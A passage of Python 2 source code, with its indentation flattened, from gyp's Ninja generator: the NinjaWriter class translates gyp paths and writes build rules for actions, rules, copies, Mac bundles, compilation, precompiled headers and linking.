self.actions_stamp = None
# Path to the output of the link step, if any.
self.binary = None
# Path to the file representing the completion of building the bundle,
# if any.
self.bundle = None
# On Windows, incremental linking requires linking against all the .objs
# that compose a .lib (rather than the .lib itself). That list is stored
# here.
self.component_objs = None
# Windows only. The import .lib is the output of a build step, but
# because dependents only link against the lib (not both the lib and the
# dll) we keep track of the import library here.
self.import_lib = None
def Linkable(self):
"""Return true if this is a target that can be linked against."""
return self.type in ('static_library', 'shared_library')
def UsesToc(self, flavor):
"""Return true if the target should produce a restat rule based on a TOC
file."""
# For bundles, the .TOC should be produced for the binary, not for
# FinalOutput(). But the naive approach would put the TOC file into the
# bundle, so don't do this for bundles for now.
if flavor == 'win' or self.bundle:
return False
return self.type in ('shared_library', 'loadable_module')
def PreActionInput(self, flavor):
"""Return the path, if any, that should be used as a dependency of
any dependent action step."""
if self.UsesToc(flavor):
return self.FinalOutput() + '.TOC'
return self.FinalOutput() or self.preaction_stamp
def PreCompileInput(self):
"""Return the path, if any, that should be used as a dependency of
any dependent compile step."""
return self.actions_stamp or self.precompile_stamp
def FinalOutput(self):
"""Return the last output of the target, which depends on all prior
steps."""
return self.bundle or self.binary or self.actions_stamp
# A small discourse on paths as used within the Ninja build:
# All files we produce (both at gyp and at build time) appear in the
# build directory (e.g. out/Debug).
#
# Paths within a given .gyp file are always relative to the directory
# containing the .gyp file. Call these "gyp paths". This includes
# sources as well as the starting directory a given gyp rule/action
# expects to be run from. We call the path from the source root to
# the gyp file the "base directory" within the per-.gyp-file
# NinjaWriter code.
#
# All paths as written into the .ninja files are relative to the build
# directory. Call these paths "ninja paths".
#
# We translate between these two notions of paths with two helper
# functions:
#
# - GypPathToNinja translates a gyp path (i.e. relative to the .gyp file)
# into the equivalent ninja path.
#
# - GypPathToUniqueOutput translates a gyp path into a ninja path to write
# an output file; the result can be namespaced such that it is unique
# to the input file name as well as the output target name.
class NinjaWriter(object):
def __init__(self, hash_for_rules, target_outputs, base_dir, build_dir,
output_file, toplevel_build, output_file_name, flavor,
toplevel_dir=None):
"""
base_dir: path from source root to directory containing this gyp file,
by gyp semantics, all input paths are relative to this
build_dir: path from source root to build output
toplevel_dir: path to the toplevel directory
"""
self.hash_for_rules = hash_for_rules
self.target_outputs = target_outputs
self.base_dir = base_dir
self.build_dir = build_dir
self.ninja = ninja_syntax.Writer(output_file)
self.toplevel_build = toplevel_build
self.output_file_name = output_file_name
self.flavor = flavor
self.abs_build_dir = None
if toplevel_dir is not None:
self.abs_build_dir = os.path.abspath(os.path.join(toplevel_dir,
build_dir))
self.obj_ext = '.obj' if flavor == 'win' else '.o'
if flavor == 'win':
# See docstring of msvs_emulation.GenerateEnvironmentFiles().
self.win_env = {}
for arch in ('x86', 'x64'):
self.win_env[arch] = 'environment.' + arch
# Relative path from build output dir to base dir.
build_to_top = gyp.common.InvertRelativePath(build_dir, toplevel_dir)
self.build_to_base = os.path.join(build_to_top, base_dir)
# Relative path from base dir to build dir.
base_to_top = gyp.common.InvertRelativePath(base_dir, toplevel_dir)
self.base_to_build = os.path.join(base_to_top, build_dir)
def ExpandSpecial(self, path, product_dir=None):
"""Expand specials like $!PRODUCT_DIR in |path|.
If |product_dir| is None, assumes the cwd is already the product
dir. Otherwise, |product_dir| is the relative path to the product
dir.
"""
PRODUCT_DIR = '$!PRODUCT_DIR'
if PRODUCT_DIR in path:
if product_dir:
path = path.replace(PRODUCT_DIR, product_dir)
else:
path = path.replace(PRODUCT_DIR + '/', '')
path = path.replace(PRODUCT_DIR + '\\', '')
path = path.replace(PRODUCT_DIR, '.')
INTERMEDIATE_DIR = '$!INTERMEDIATE_DIR'
if INTERMEDIATE_DIR in path:
int_dir = self.GypPathToUniqueOutput('gen')
# GypPathToUniqueOutput generates a path relative to the product dir,
# so insert product_dir in front if it is provided.
path = path.replace(INTERMEDIATE_DIR,
os.path.join(product_dir or '', int_dir))
CONFIGURATION_NAME = '$|CONFIGURATION_NAME'
path = path.replace(CONFIGURATION_NAME, self.config_name)
return path
def ExpandRuleVariables(self, path, root, dirname, source, ext, name):
if self.flavor == 'win':
path = self.msvs_settings.ConvertVSMacros(
path, config=self.config_name)
path = path.replace(generator_default_variables['RULE_INPUT_ROOT'], root)
path = path.replace(generator_default_variables['RULE_INPUT_DIRNAME'],
dirname)
path = path.replace(generator_default_variables['RULE_INPUT_PATH'], source)
path = path.replace(generator_default_variables['RULE_INPUT_EXT'], ext)
path = path.replace(generator_default_variables['RULE_INPUT_NAME'], name)
return path
def GypPathToNinja(self, path, env=None):
"""Translate a gyp path to a ninja path, optionally expanding environment
variable references in |path| with |env|.
See the above discourse on path conversions."""
if env:
if self.flavor == 'mac':
path = gyp.xcode_emulation.ExpandEnvVars(path, env)
elif self.flavor == 'win':
path = gyp.msvs_emulation.ExpandMacros(path, env)
if path.startswith('$!'):
expanded = self.ExpandSpecial(path)
if self.flavor == 'win':
expanded = os.path.normpath(expanded)
return expanded
if '$|' in path:
path = self.ExpandSpecial(path)
assert '$' not in path, path
return os.path.normpath(os.path.join(self.build_to_base, path))
def GypPathToUniqueOutput(self, path, qualified=True):
"""Translate a gyp path to a ninja path for writing output.
If qualified is True, qualify the resulting filename with the name
of the target. This is necessary when e.g. compiling the same
path twice for two separate output targets.
See the above discourse on path conversions."""
path = self.ExpandSpecial(path)
assert not path.startswith('$'), path
# Translate the path following this scheme:
# Input: foo/bar.gyp, target targ, references baz/out.o
# Output: obj/foo/baz/targ.out.o (if qualified)
# obj/foo/baz/out.o (otherwise)
# (and obj.host instead of obj for cross-compiles)
#
# Why this scheme and not some other one?
# 1) for a given input, you can compute all derived outputs by matching
# its path, even if the input is brought via a gyp file with '..'.
# 2) simple files like libraries and stamps have a simple filename.
obj = 'obj'
if self.toolset != 'target':
obj += '.' + self.toolset
path_dir, path_basename = os.path.split(path)
assert not os.path.isabs(path_dir), (
"'%s' can not be absolute path (see crbug.com/462153)." % path_dir)
if qualified:
path_basename = self.name + '.' + path_basename
return os.path.normpath(os.path.join(obj, self.base_dir, path_dir,
path_basename))
def WriteCollapsedDependencies(self, name, targets, order_only=None):
"""Given a list of targets, return a path for a single file
representing the result of building all the targets or None.
Uses a stamp file if necessary."""
assert targets == filter(None, targets), targets
if len(targets) == 0:
assert not order_only
return None
if len(targets) > 1 or order_only:
stamp = self.GypPathToUniqueOutput(name + '.stamp')
targets = self.ninja.build(stamp, 'stamp', targets, order_only=order_only)
self.ninja.newline()
return targets[0]
def _SubninjaNameForArch(self, arch):
output_file_base = os.path.splitext(self.output_file_name)[0]
return '%s.%s.ninja' % (output_file_base, arch)
def WriteSpec(self, spec, config_name, generator_flags):
"""The main entry point for NinjaWriter: write the build rules for a spec.
Returns a Target object, which represents the output paths for this spec.
Returns None if there are no outputs (e.g. a settings-only 'none' type
target)."""
self.config_name = config_name
self.name = spec['target_name']
self.toolset = spec['toolset']
config = spec['configurations'][config_name]
self.target = Target(spec['type'])
self.is_standalone_static_library = bool(
spec.get('standalone_static_library', 0))
# Track if this target contains any C++ files, to decide if gcc or g++
# should be used for linking.
self.uses_cpp = False
self.is_mac_bundle = gyp.xcode_emulation.IsMacBundle(self.flavor, spec)
self.xcode_settings = self.msvs_settings = None
if self.flavor == 'mac':
self.xcode_settings = gyp.xcode_emulation.XcodeSettings(spec)
if self.flavor == 'win':
self.msvs_settings = gyp.msvs_emulation.MsvsSettings(spec,
generator_flags)
arch = self.msvs_settings.GetArch(config_name)
self.ninja.variable('arch', self.win_env[arch])
self.ninja.variable('cc', '$cl_' + arch)
self.ninja.variable('cxx', '$cl_' + arch)
self.ninja.variable('cc_host', '$cl_' + arch)
self.ninja.variable('cxx_host', '$cl_' + arch)
self.ninja.variable('asm', '$ml_' + arch)
if self.flavor == 'mac':
self.archs = self.xcode_settings.GetActiveArchs(config_name)
if len(self.archs) > 1:
self.arch_subninjas = dict(
(arch, ninja_syntax.Writer(
OpenOutput(os.path.join(self.toplevel_build,
self._SubninjaNameForArch(arch)),
'w')))
for arch in self.archs)
# Compute predepends for all rules.
# actions_depends is the dependencies this target depends on before running
# any of its action/rule/copy steps.
# compile_depends is the dependencies this target depends on before running
# any of its compile steps.
actions_depends = []
compile_depends = []
# TODO(evan): it is rather confusing which things are lists and which
# are strings. Fix these.
if 'dependencies' in spec:
for dep in spec['dependencies']:
if dep in self.target_outputs:
target = self.target_outputs[dep]
actions_depends.append(target.PreActionInput(self.flavor))
compile_depends.append(target.PreCompileInput())
actions_depends = filter(None, actions_depends)
compile_depends = filter(None, compile_depends)
actions_depends = self.WriteCollapsedDependencies('actions_depends',
actions_depends)
compile_depends = self.WriteCollapsedDependencies('compile_depends',
compile_depends)
self.target.preaction_stamp = actions_depends
self.target.precompile_stamp = compile_depends
# Write out actions, rules, and copies. These must happen before we
# compile any sources, so compute a list of predependencies for sources
# while we do it.
extra_sources = []
mac_bundle_depends = []
self.target.actions_stamp = self.WriteActionsRulesCopies(
spec, extra_sources, actions_depends, mac_bundle_depends)
# If we have actions/rules/copies, we depend directly on those, but
# otherwise we depend on dependent target's actions/rules/copies etc.
# We never need to explicitly depend on previous target's link steps,
# because no compile ever depends on them.
compile_depends_stamp = (self.target.actions_stamp or compile_depends)
# Write out the compilation steps, if any.
link_deps = []
sources = extra_sources + spec.get('sources', [])
if sources:
if self.flavor == 'mac' and len(self.archs) > 1:
# Write subninja file containing compile and link commands scoped to
# a single arch if a fat binary is being built.
for arch in self.archs:
self.ninja.subninja(self._SubninjaNameForArch(arch))
pch = None
if self.flavor == 'win':
gyp.msvs_emulation.VerifyMissingSources(
sources, self.abs_build_dir, generator_flags, self.GypPathToNinja)
pch = gyp.msvs_emulation.PrecompiledHeader(
self.msvs_settings, config_name, self.GypPathToNinja,
self.GypPathToUniqueOutput, self.obj_ext)
else:
pch = gyp.xcode_emulation.MacPrefixHeader(
self.xcode_settings, self.GypPathToNinja,
lambda path, lang: self.GypPathToUniqueOutput(path + '-' + lang))
link_deps = self.WriteSources(
self.ninja, config_name, config, sources, compile_depends_stamp, pch,
spec)
# Some actions/rules output 'sources' that are already object files.
obj_outputs = [f for f in sources if f.endswith(self.obj_ext)]
if obj_outputs:
if self.flavor != 'mac' or len(self.archs) == 1:
link_deps += [self.GypPathToNinja(o) for o in obj_outputs]
else:
print "Warning: Actions/rules writing object files don't work with " \
"multiarch targets, dropping. (target %s)" % spec['target_name']
elif self.flavor == 'mac' and len(self.archs) > 1:
link_deps = collections.defaultdict(list)
if self.flavor == 'win' and self.target.type == 'static_library':
self.target.component_objs = link_deps
# Write out a link step, if needed.
output = None
is_empty_bundle = not link_deps and not mac_bundle_depends
if link_deps or self.target.actions_stamp or actions_depends:
output = self.WriteTarget(spec, config_name, config, link_deps,
self.target.actions_stamp or actions_depends)
if self.is_mac_bundle:
mac_bundle_depends.append(output)
# Bundle all of the above together, if needed.
if self.is_mac_bundle:
output = self.WriteMacBundle(spec, mac_bundle_depends, is_empty_bundle)
if not output:
return None
assert self.target.FinalOutput(), output
return self.target
def _WinIdlRule(self, source, prebuild, outputs):
"""Handle the implicit VS .idl rule for one source file. Fills |outputs|
with files that are generated."""
outdir, output, vars, flags = self.msvs_settings.GetIdlBuildData(
source, self.config_name)
outdir = self.GypPathToNinja(outdir)
def fix_path(path, rel=None):
path = os.path.join(outdir, path)
dirname, basename = os.path.split(source)
root, ext = os.path.splitext(basename)
path = self.ExpandRuleVariables(
path, root, dirname, source, ext, basename)
if rel:
path = os.path.relpath(path, rel)
return path
vars = [(name, fix_path(value, outdir)) for name, value in vars]
output = [fix_path(p) for p in output]
vars.append(('outdir', outdir))
vars.append(('idlflags', flags))
input = self.GypPathToNinja(source)
self.ninja.build(output, 'idl', input,
variables=vars, order_only=prebuild)
outputs.extend(output)
def WriteWinIdlFiles(self, spec, prebuild):
"""Writes rules to match MSVS's implicit idl handling."""
assert self.flavor == 'win'
if self.msvs_settings.HasExplicitIdlRulesOrActions(spec):
return []
outputs = []
for source in filter(lambda x: x.endswith('.idl'), spec['sources']):
self._WinIdlRule(source, prebuild, outputs)
return outputs
def WriteActionsRulesCopies(self, spec, extra_sources, prebuild,
mac_bundle_depends):
"""Write out the Actions, Rules, and Copies steps. Return a path
representing the outputs of these steps."""
outputs = []
if self.is_mac_bundle:
mac_bundle_resources = spec.get('mac_bundle_resources', [])[:]
else:
mac_bundle_resources = []
extra_mac_bundle_resources = []
if 'actions' in spec:
outputs += self.WriteActions(spec['actions'], extra_sources, prebuild,
extra_mac_bundle_resources)
if 'rules' in spec:
outputs += self.WriteRules(spec['rules'], extra_sources, prebuild,
mac_bundle_resources,
extra_mac_bundle_resources)
if 'copies' in spec:
outputs += self.WriteCopies(spec['copies'], prebuild, mac_bundle_depends)
if 'sources' in spec and self.flavor == 'win':
outputs += self.WriteWinIdlFiles(spec, prebuild)
stamp = self.WriteCollapsedDependencies('actions_rules_copies', outputs)
if self.is_mac_bundle:
xcassets = self.WriteMacBundleResources(
extra_mac_bundle_resources + mac_bundle_resources, mac_bundle_depends)
partial_info_plist = self.WriteMacXCassets(xcassets, mac_bundle_depends)
self.WriteMacInfoPlist(partial_info_plist, mac_bundle_depends)
return stamp
def GenerateDescription(self, verb, message, fallback):
"""Generate and return a description of a build step.
|verb| is the short summary, e.g. ACTION or RULE.
|message| is a hand-written description, or None if not available.
|fallback| is the gyp-level name of the step, usable as a fallback.
"""
if self.toolset != 'target':
verb += '(%s)' % self.toolset
if message:
return '%s %s' % (verb, self.ExpandSpecial(message))
else:
return '%s %s: %s' % (verb, self.name, fallback)
def WriteActions(self, actions, extra_sources, prebuild,
extra_mac_bundle_resources):
# Actions cd into the base directory.
env = self.GetToolchainEnv()
all_outputs = []
for action in actions:
# First write out a rule for the action.
name = '%s_%s' % (action['action_name'], self.hash_for_rules)
description = self.GenerateDescription('ACTION',
action.get('message', None),
name)
is_cygwin = (self.msvs_settings.IsRuleRunUnderCygwin(action)
if self.flavor == 'win' else False)
args = action['action']
depfile = action.get('depfile', None)
if depfile:
depfile = self.ExpandSpecial(depfile, self.base_to_build)
pool = 'console' if int(action.get('ninja_use_console', 0)) else None
rule_name, _ = self.WriteNewNinjaRule(name, args, description,
is_cygwin, env, pool,
depfile=depfile)
inputs = [self.GypPathToNinja(i, env) for i in action['inputs']]
if int(action.get('process_outputs_as_sources', False)):
extra_sources += action['outputs']
if int(action.get('process_outputs_as_mac_bundle_resources', False)):
extra_mac_bundle_resources += action['outputs']
outputs = [self.GypPathToNinja(o, env) for o in action['outputs']]
# Then write out an edge using the rule.
self.ninja.build(outputs, rule_name, inputs,
order_only=prebuild)
all_outputs += outputs
self.ninja.newline()
return all_outputs
def WriteRules(self, rules, extra_sources, prebuild,
mac_bundle_resources, extra_mac_bundle_resources):
env = self.GetToolchainEnv()
all_outputs = []
for rule in rules:
# Skip a rule with no action and no inputs.
if 'action' not in rule and not rule.get('rule_sources', []):
continue
# First write out a rule for the rule action.
name = '%s_%s' % (rule['rule_name'], self.hash_for_rules)
args = rule['action']
description = self.GenerateDescription(
'RULE',
rule.get('message', None),
('%s ' + generator_default_variables['RULE_INPUT_PATH']) % name)
is_cygwin = (self.msvs_settings.IsRuleRunUnderCygwin(rule)
if self.flavor == 'win' else False)
pool = 'console' if int(rule.get('ninja_use_console', 0)) else None
rule_name, args = self.WriteNewNinjaRule(
name, args, description, is_cygwin, env, pool)
# TODO: if the command references the outputs directly, we should
# simplify it to just use $out.
# Rules can potentially make use of some special variables which
# must vary per source file.
# Compute the list of variables we'll need to provide.
special_locals = ('source', 'root', 'dirname', 'ext', 'name')
needed_variables = set(['source'])
for argument in args:
for var in special_locals:
if '${%s}' % var in argument:
needed_variables.add(var)
def cygwin_munge(path):
# pylint: disable=cell-var-from-loop
if is_cygwin:
return path.replace('\\', '/')
return path
inputs = [self.GypPathToNinja(i, env) for i in rule.get('inputs', [])]
# If there are n source files matching the rule, and m additional rule
# inputs, then adding 'inputs' to each build edge written below will
# write m * n inputs. Collapsing reduces this to m + n.
sources = rule.get('rule_sources', [])
num_inputs = len(inputs)
if prebuild:
num_inputs += 1
if num_inputs > 2 and len(sources) > 2:
inputs = [self.WriteCollapsedDependencies(
rule['rule_name'], inputs, order_only=prebuild)]
prebuild = []
# For each source file, write an edge that generates all the outputs.
for source in sources:
source = os.path.normpath(source)
dirname, basename = os.path.split(source)
root, ext = os.path.splitext(basename)
# Gather the list of inputs and outputs, expanding $vars if possible.
outputs = [self.ExpandRuleVariables(o, root, dirname,
source, ext, basename)
for o in rule['outputs']]
if int(rule.get('process_outputs_as_sources', False)):
extra_sources += outputs
was_mac_bundle_resource = source in mac_bundle_resources
if was_mac_bundle_resource or \
int(rule.get('process_outputs_as_mac_bundle_resources', False)):
extra_mac_bundle_resources += outputs
# Note: This is n_resources * n_outputs_in_rule. Put to-be-removed
# items in a set and remove them all in a single pass if this becomes
# a performance issue.
if was_mac_bundle_resource:
mac_bundle_resources.remove(source)
extra_bindings = []
for var in needed_variables:
if var == 'root':
extra_bindings.append(('root', cygwin_munge(root)))
elif var == 'dirname':
# '$dirname' is a parameter to the rule action, which means
# it shouldn't be converted to a Ninja path. But we don't
# want $!PRODUCT_DIR in there either.
dirname_expanded = self.ExpandSpecial(dirname, self.base_to_build)
extra_bindings.append(('dirname', cygwin_munge(dirname_expanded)))
elif var == 'source':
# '$source' is a parameter to the rule action, which means
# it shouldn't be converted to a Ninja path. But we don't
# want $!PRODUCT_DIR in there either.
source_expanded = self.ExpandSpecial(source, self.base_to_build)
extra_bindings.append(('source', cygwin_munge(source_expanded)))
elif var == 'ext':
extra_bindings.append(('ext', ext))
elif var == 'name':
extra_bindings.append(('name', cygwin_munge(basename)))
else:
assert var == None, repr(var)
outputs = [self.GypPathToNinja(o, env) for o in outputs]
if self.flavor == 'win':
# WriteNewNinjaRule uses unique_name for creating an rsp file on win.
extra_bindings.append(('unique_name',
hashlib.md5(outputs[0]).hexdigest()))
self.ninja.build(outputs, rule_name, self.GypPathToNinja(source),
implicit=inputs,
order_only=prebuild,
variables=extra_bindings)
all_outputs.extend(outputs)
return all_outputs
def WriteCopies(self, copies, prebuild, mac_bundle_depends):
outputs = []
env = self.GetToolchainEnv()
for copy in copies:
for path in copy['files']:
# Normalize the path so trailing slashes don't confuse us.
path = os.path.normpath(path)
basename = os.path.split(path)[1]
src = self.GypPathToNinja(path, env)
dst = self.GypPathToNinja(os.path.join(copy['destination'], basename),
env)
outputs += self.ninja.build(dst, 'copy', src, order_only=prebuild)
if self.is_mac_bundle:
# gyp has mac_bundle_resources to copy things into a bundle's
# Resources folder, but there's no built-in way to copy files to other
# places in the bundle. Hence, some targets use copies for this. Check
# if this file is copied into the current bundle, and if so add it to
# the bundle depends so that dependent targets get rebuilt if the copy
# input changes.
if dst.startswith(self.xcode_settings.GetBundleContentsFolderPath()):
mac_bundle_depends.append(dst)
return outputs
def WriteMacBundleResources(self, resources, bundle_depends):
"""Writes ninja edges for 'mac_bundle_resources'."""
xcassets = []
for output, res in gyp.xcode_emulation.GetMacBundleResources(
generator_default_variables['PRODUCT_DIR'],
self.xcode_settings, map(self.GypPathToNinja, resources)):
output = self.ExpandSpecial(output)
if os.path.splitext(output)[-1] != '.xcassets':
isBinary = self.xcode_settings.IsBinaryOutputFormat(self.config_name)
self.ninja.build(output, 'mac_tool', res,
variables=[('mactool_cmd', 'copy-bundle-resource'), \
('binary', isBinary)])
bundle_depends.append(output)
else:
xcassets.append(res)
return xcassets
def WriteMacXCassets(self, xcassets, bundle_depends):
"""Writes ninja edges for 'mac_bundle_resources' .xcassets files.
This add an invocation of 'actool' via the 'mac_tool.py' helper script.
It assumes that the assets catalogs define at least one imageset and
thus an Assets.car file will be generated in the application resources
directory. If this is not the case, then the build will probably be done
at each invocation of ninja."""
if not xcassets:
return
extra_arguments = {}
settings_to_arg = {
'XCASSETS_APP_ICON': 'app-icon',
'XCASSETS_LAUNCH_IMAGE': 'launch-image',
}
settings = self.xcode_settings.xcode_settings[self.config_name]
for settings_key, arg_name in settings_to_arg.iteritems():
value = settings.get(settings_key)
if value:
extra_arguments[arg_name] = value
partial_info_plist = None
if extra_arguments:
partial_info_plist = self.GypPathToUniqueOutput(
'assetcatalog_generated_info.plist')
extra_arguments['output-partial-info-plist'] = partial_info_plist
outputs = []
outputs.append(
os.path.join(
self.xcode_settings.GetBundleResourceFolder(),
'Assets.car'))
if partial_info_plist:
outputs.append(partial_info_plist)
keys = QuoteShellArgument(json.dumps(extra_arguments), self.flavor)
extra_env = self.xcode_settings.GetPerTargetSettings()
env = self.GetSortedXcodeEnv(additional_settings=extra_env)
env = self.ComputeExportEnvString(env)
bundle_depends.extend(self.ninja.build(
outputs, 'compile_xcassets', xcassets,
variables=[('env', env), ('keys', keys)]))
return partial_info_plist
def WriteMacInfoPlist(self, partial_info_plist, bundle_depends):
"""Write build rules for bundle Info.plist files."""
info_plist, out, defines, extra_env = gyp.xcode_emulation.GetMacInfoPlist(
generator_default_variables['PRODUCT_DIR'],
self.xcode_settings, self.GypPathToNinja)
if not info_plist:
return
out = self.ExpandSpecial(out)
if defines:
# Create an intermediate file to store preprocessed results.
intermediate_plist = self.GypPathToUniqueOutput(
os.path.basename(info_plist))
defines = ' '.join([Define(d, self.flavor) for d in defines])
info_plist = self.ninja.build(
intermediate_plist, 'preprocess_infoplist', info_plist,
variables=[('defines',defines)])
env = self.GetSortedXcodeEnv(additional_settings=extra_env)
env = self.ComputeExportEnvString(env)
if partial_info_plist:
intermediate_plist = self.GypPathToUniqueOutput('merged_info.plist')
info_plist = self.ninja.build(
intermediate_plist, 'merge_infoplist',
[partial_info_plist, info_plist])
keys = self.xcode_settings.GetExtraPlistItems(self.config_name)
keys = QuoteShellArgument(json.dumps(keys), self.flavor)
isBinary = self.xcode_settings.IsBinaryOutputFormat(self.config_name)
self.ninja.build(out, 'copy_infoplist', info_plist,
variables=[('env', env), ('keys', keys),
('binary', isBinary)])
bundle_depends.append(out)
def WriteSources(self, ninja_file, config_name, config, sources, predepends,
precompiled_header, spec):
"""Write build rules to compile all of |sources|."""
if self.toolset == 'host':
self.ninja.variable('ar', '$ar_host')
self.ninja.variable('cc', '$cc_host')
self.ninja.variable('cxx', '$cxx_host')
self.ninja.variable('ld', '$ld_host')
self.ninja.variable('ldxx', '$ldxx_host')
self.ninja.variable('nm', '$nm_host')
self.ninja.variable('readelf', '$readelf_host')
if self.flavor != 'mac' or len(self.archs) == 1:
return self.WriteSourcesForArch(
self.ninja, config_name, config, sources, predepends,
precompiled_header, spec)
else:
return dict((arch, self.WriteSourcesForArch(
self.arch_subninjas[arch], config_name, config, sources, predepends,
precompiled_header, spec, arch=arch))
for arch in self.archs)
def WriteSourcesForArch(self, ninja_file, config_name, config, sources,
predepends, precompiled_header, spec, arch=None):
"""Write build rules to compile all of |sources|."""
extra_defines = []
if self.flavor == 'mac':
cflags = self.xcode_settings.GetCflags(config_name, arch=arch)
cflags_c = self.xcode_settings.GetCflagsC(config_name)
cflags_cc = self.xcode_settings.GetCflagsCC(config_name)
cflags_objc = ['$cflags_c'] + \
self.xcode_settings.GetCflagsObjC(config_name)
cflags_objcc = ['$cflags_cc'] + \
self.xcode_settings.GetCflagsObjCC(config_name)
elif self.flavor == 'win':
asmflags = self.msvs_settings.GetAsmflags(config_name)
cflags = self.msvs_settings.GetCflags(config_name)
cflags_c = self.msvs_settings.GetCflagsC(config_name)
cflags_cc = self.msvs_settings.GetCflagsCC(config_name)
extra_defines = self.msvs_settings.GetComputedDefines(config_name)
# See comment at cc_command for why there's two .pdb files.
pdbpath_c = pdbpath_cc = self.msvs_settings.GetCompilerPdbName(
config_name, self.ExpandSpecial)
if not pdbpath_c:
obj = 'obj'
if self.toolset != 'target':
obj += '.' + self.toolset
pdbpath = os.path.normpath(os.path.join(obj, self.base_dir, self.name))
pdbpath_c = pdbpath + '.c.pdb'
pdbpath_cc = pdbpath + '.cc.pdb'
self.WriteVariableList(ninja_file, 'pdbname_c', [pdbpath_c])
self.WriteVariableList(ninja_file, 'pdbname_cc', [pdbpath_cc])
self.WriteVariableList(ninja_file, 'pchprefix', [self.name])
else:
cflags = config.get('cflags', [])
cflags_c = config.get('cflags_c', [])
cflags_cc = config.get('cflags_cc', [])
# Respect environment variables related to build, but target-specific
# flags can still override them.
if self.toolset == 'target':
cflags_c = (os.environ.get('CPPFLAGS', '').split() +
os.environ.get('CFLAGS', '').split() + cflags_c)
cflags_cc = (os.environ.get('CPPFLAGS', '').split() +
os.environ.get('CXXFLAGS', '').split() + cflags_cc)
elif self.toolset == 'host':
cflags_c = (os.environ.get('CPPFLAGS_host', '').split() +
os.environ.get('CFLAGS_host', '').split() + cflags_c)
cflags_cc = (os.environ.get('CPPFLAGS_host', '').split() +
os.environ.get('CXXFLAGS_host', '').split() + cflags_cc)
defines = config.get('defines', []) + extra_defines
self.WriteVariableList(ninja_file, 'defines',
[Define(d, self.flavor) for d in defines])
if self.flavor == 'win':
self.WriteVariableList(ninja_file, 'asmflags',
map(self.ExpandSpecial, asmflags))
self.WriteVariableList(ninja_file, 'rcflags',
[QuoteShellArgument(self.ExpandSpecial(f), self.flavor)
for f in self.msvs_settings.GetRcflags(config_name,
self.GypPathToNinja)])
include_dirs = config.get('include_dirs', [])
env = self.GetToolchainEnv()
if self.flavor == 'win':
include_dirs = self.msvs_settings.AdjustIncludeDirs(include_dirs,
config_name)
self.WriteVariableList(ninja_file, 'includes',
[QuoteShellArgument('-I' + self.GypPathToNinja(i, env), self.flavor)
for i in include_dirs])
if self.flavor == 'win':
midl_include_dirs = config.get('midl_include_dirs', [])
midl_include_dirs = self.msvs_settings.AdjustMidlIncludeDirs(
midl_include_dirs, config_name)
self.WriteVariableList(ninja_file, 'midl_includes',
[QuoteShellArgument('-I' + self.GypPathToNinja(i, env), self.flavor)
for i in midl_include_dirs])
pch_commands = precompiled_header.GetPchBuildCommands(arch)
if self.flavor == 'mac':
# Most targets use no precompiled headers, so only write these if needed.
for ext, var in [('c', 'cflags_pch_c'), ('cc', 'cflags_pch_cc'),
('m', 'cflags_pch_objc'), ('mm', 'cflags_pch_objcc')]:
include = precompiled_header.GetInclude(ext, arch)
if include: ninja_file.variable(var, include)
arflags = config.get('arflags', [])
self.WriteVariableList(ninja_file, 'cflags',
map(self.ExpandSpecial, cflags))
self.WriteVariableList(ninja_file, 'cflags_c',
map(self.ExpandSpecial, cflags_c))
self.WriteVariableList(ninja_file, 'cflags_cc',
map(self.ExpandSpecial, cflags_cc))
if self.flavor == 'mac':
self.WriteVariableList(ninja_file, 'cflags_objc',
map(self.ExpandSpecial, cflags_objc))
self.WriteVariableList(ninja_file, 'cflags_objcc',
map(self.ExpandSpecial, cflags_objcc))
self.WriteVariableList(ninja_file, 'arflags',
map(self.ExpandSpecial, arflags))
ninja_file.newline()
outputs = []
has_rc_source = False
for source in sources:
filename, ext = os.path.splitext(source)
ext = ext[1:]
obj_ext = self.obj_ext
if ext in ('cc', 'cpp', 'cxx'):
command = 'cxx'
self.uses_cpp = True
elif ext == 'c' or (ext == 'S' and self.flavor != 'win'):
command = 'cc'
elif ext == 's' and self.flavor != 'win': # Doesn't generate .o.d files.
command = 'cc_s'
elif (self.flavor == 'win' and ext == 'asm' and
not self.msvs_settings.HasExplicitAsmRules(spec)):
command = 'asm'
# Add the _asm suffix as msvs is capable of handling .cc and
# .asm files of the same name without collision.
obj_ext = '_asm.obj'
elif self.flavor == 'mac' and ext == 'm':
command = 'objc'
elif self.flavor == 'mac' and ext == 'mm':
command = 'objcxx'
self.uses_cpp = True
elif self.flavor == 'win' and ext == 'rc':
command = 'rc'
obj_ext = '.res'
has_rc_source = True
else:
# Ignore unhandled extensions.
continue
input = self.GypPathToNinja(source)
output = self.GypPathToUniqueOutput(filename + obj_ext)
if arch is not None:
output = AddArch(output, arch)
implicit = precompiled_header.GetObjDependencies([input], [output], arch)
variables = []
if self.flavor == 'win':
variables, output, implicit = precompiled_header.GetFlagsModifications(
input, output, implicit, command, cflags_c, cflags_cc,
self.ExpandSpecial)
ninja_file.build(output, command, input,
implicit=[gch for _, _, gch in implicit],
order_only=predepends, variables=variables)
outputs.append(output)
if has_rc_source:
resource_include_dirs = config.get('resource_include_dirs', include_dirs)
self.WriteVariableList(ninja_file, 'resource_includes',
[QuoteShellArgument('-I' + self.GypPathToNinja(i, env), self.flavor)
for i in resource_include_dirs])
self.WritePchTargets(ninja_file, pch_commands)
ninja_file.newline()
return outputs
def WritePchTargets(self, ninja_file, pch_commands):
"""Writes ninja rules to compile prefix headers."""
if not pch_commands:
return
for gch, lang_flag, lang, input in pch_commands:
var_name = {
'c': 'cflags_pch_c',
'cc': 'cflags_pch_cc',
'm': 'cflags_pch_objc',
'mm': 'cflags_pch_objcc',
}[lang]
map = { 'c': 'cc', 'cc': 'cxx', 'm': 'objc', 'mm': 'objcxx', }
cmd = map.get(lang)
ninja_file.build(gch, cmd, input, variables=[(var_name, lang_flag)])
def WriteLink(self, spec, config_name, config, link_deps):
"""Write out a link step. Fills out target.binary. """
if self.flavor != 'mac' or len(self.archs) == 1:
return self.WriteLinkForArch(
self.ninja, spec, config_name, config, link_deps)
else:
output = self.ComputeOutput(spec)
inputs = [self.WriteLinkForArch(self.arch_subninjas[arch], spec,
config_name, config, link_deps[arch],
arch=arch)
for arch in self.archs]
extra_bindings = []
build_output = output
if not self.is_mac_bundle:
self.AppendPostbuildVariable(extra_bindings, spec, output, output)
# TODO(yyanagisawa): more work needed to fix:
# https://code.google.com/p/gyp/issues/detail?id=411
if (spec['type'] in ('shared_library', 'loadable_module') and
not self.is_mac_bundle):
extra_bindings.append(('lib', output))
self.ninja.build([output, output + '.TOC'], 'solipo', inputs,
variables=extra_bindings)
else:
